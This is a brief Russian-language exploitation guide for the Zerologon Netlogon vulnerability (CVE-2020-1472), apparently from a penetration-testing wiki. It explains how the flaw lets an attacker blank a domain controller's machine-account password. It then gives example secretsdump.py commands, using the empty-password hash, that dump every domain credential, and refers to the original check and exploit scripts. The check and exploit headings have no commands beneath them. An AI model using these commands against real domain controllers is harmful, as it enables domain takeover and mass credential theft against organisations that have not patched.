
[CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Privilege Escalation (Zerologon)
[CVE-2020-1472] Повышение привилегий через удаленный вызов протокола Netlogon (MS-NRPC) (Zerologon)
Описанная здесь атака использует уязвимости в криптографическом протоколе аутентификации (небезопасное использование AES-CFB8), который подтверждает подлинность и идентичность компьютера, присоединенного к домену, перед контроллером домена (DC). Из-за неправильного использования режима работы AES можно подделать идентичность любой учетной записи компьютера (включая сам DC) и установить пустой пароль (просто отправляя несколько сообщений Netlogon, в которых различные поля заполнены нулями) для этой учетной записи в домене. Затем это можно использовать для получения учетных данных администратора домена и последующего восстановления исходного пароля DC.
Для проверки CVE-2020-1472
Для эксплуатации CVE-2020-1472
Затем выполните одну из следующих команд
Пример формата 1: python secretsdump.py domain/example-dc$@fqdn-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
Пример формата 2: python secretsdump.py domain/example-dc$@ip-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc

Оригинальная запись в блоге доступна здесь
Оригинальный репозиторий с Python-скриптом для проверки доступен здесь
Оригинальный репозиторий с Python-скриптом для эксплуатации доступен здесь